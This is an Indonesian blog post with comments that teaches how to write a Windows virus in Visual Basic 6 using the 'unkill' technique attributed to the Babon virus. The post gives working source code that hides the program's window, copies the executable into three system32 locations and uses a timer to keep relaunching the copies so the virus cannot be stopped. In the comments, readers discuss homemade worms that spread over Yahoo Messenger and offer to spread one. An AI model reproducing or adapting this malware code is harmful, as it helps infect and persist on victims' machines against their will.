Teknik unkill virus Babon
Posted by Morphic pada Agustus 4, 2009
Pernah dengar virus babon? Ooo pasti pernah dong. Dulu teknik yang dipake ama virus ini cukup ngetren dimasa-nya… Sampe-sampe banyak Avmaker juga bingung tuh ama virus ini. Apa yang aneh?
Si Babon ternyata make teknik unkill. Yang artinya ”tidak dapat dibunuh”. Tapi bukan berarti gak bisa mati! Ada cranya juga membunuhnya…
Secara logika begini trik-nya…
-buat lebih dari satu induk virusmu
-perintahkan mereka untuk saling memanggil….
Cukup dua baris itu aja. Ha ha ha. Sepertinya banyak yang udah tahu trik ini tapi gak apa-apa deh buat yang newbie.
Begini. Andaikan kamu membuat virus… Pastinya virus kamu membuat induk di komputer korban…
Perhatikan aku mnulis source code virus sederhana berikut.
Private sub form_load()
App.taskvisible=false
me.visible=false
Call SpreadFile
End sub
Sub SpreadFile()
On error resume next
Dim Location(3) as string
Dim jml as integer
Location(1) = Environ$(“windir”) & “\system32\Top.exe”
Location(2) = Environ$(“windir”) & “\system32\Top2.exe”
Location(3) = Environ$(“windir”) & “\system32\Top3.exe”
For jml = 1 to 3
Filecopy app.path & “\” & app.exename & “.exe” , location(jml)
Next
End Sub
Itu sederhananya.. itu source untuk menyebarkan induk-nya… Lalu?
Supaya kita bisa make teknik unkill tambahkan satu timer yang intervalnya kurang dari 500. (ingat: satu detik sama dengan 1000 interval timer!)
Private sub Timer1_timer()
Shell Environ$(“windir”) & “\system32\Top.exe”
Shell Environ$(“windir”) & “\system32\Top2.exe”
Shell Environ$(“windir”) & “\system32\Top3.exe”
End sub
Lalu jangan lupa tambahkan sedikit code di Form_Load().
Pokoknya terakhir code-nya seprti ini:
Private sub form_load()
If app.Previstance then End
App.taskvisible=false
me.visible=false
Call SpreadFile
End sub
Kalo Babon lain lagi…
Coba buat satu module dan ketik code-nya berikut:
Declare Function FindWindow Lib “user32″ Alias “FindWindowA” (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Declare Function GetWindow Lib “user32″ (ByVal hwnd As Long, ByVal wCmd As Long) As Long
Declare Function OpenIcon Lib “user32″ (ByVal hwnd As Long) As Long
Declare Function SetForegroundWindow Lib “user32″ (ByVal hwnd As Long) As Long
Public Const GW_HWNDPREV = 3
Private Sub ShowPrevInstance()
Dim OldTitle As String
Dim ll_WindowHandle As Long
OldTitle = App.Title
App.Title = “abcde – Aplikasi ini akan ditutup!”
ll_WindowHandle = FindWindow(“ThunderRT6Main”, OldTitle)
If ll_WindowHandle = 0 Then Exit Sub
ll_WindowHandle = GetWindow(ll_WindowHandle, GW_HWNDPREV)
Call OpenIcon(ll_WindowHandle)
Call SetForegroundWindow(ll_WindowHandle)
End
End Sub
Sub Main()
If App.PrevInstance Then Showprevinstance
Load Form1
Form1.Show
End sub
Jangan lupa mengubah startup virusmu menjadi “sub main”. Okey!
Sekian tutorial dari saya…
Thanks
By:Morphic
Karta_morphic@yahoo.co.id
Thanks to:
http://www.morphostlab.co.nr
MorphostLab Team
Anak-anak FK USU stambuk 09
Vx berkata
Agustus tanggal 4 2009. waktu aq masih suka maen game. hahahahah
poet berkata
hihihi. . .
. kalo gagal, ya coba lagi. :p
saya ga pernah nyebarin worm buatan saya dgn sengaja kok. saya cma blajar teknik2 baru, trus d cba d kompi d rmah. kalo brhasil, sourcenya d simpen, file exe-nya di hapus.
worm trakhir udah bsa ngirim pesan lewat YM ama punya fitur auto update. .
oya bang, worm yg bsa ngrubah wallpaper it mainnya dmana? registry? key-nya apa? saya gak brhasil nemuinnya . T-T
Morphic berkata
mau ngubah wallpaper?
coba gini:
HKCU\Control Panel\Desktop-Wallpaper
HKCU\Control Panel\Desktop\OriginalWallpaper
HKCU\Control Panel\Desktop\ConvertedWallpaper
HKU\DEFAULT\Control Panel\Desktop\Wallpaper
poet berkata
ada yg mau nyebarin worm buatan saya ndak? xD
Morphic berkata
worm yg gimana tuh?
tobat poet! tobat!
yudha berkata
kyanya dulu g pernah kena nih virus, basminya pke AV tetangga. nyusahin emang nih virus. btw… virusmu pernah mem-booming gak phic?
Morphic berkata
pernah dulu….
di daerah skul-ku..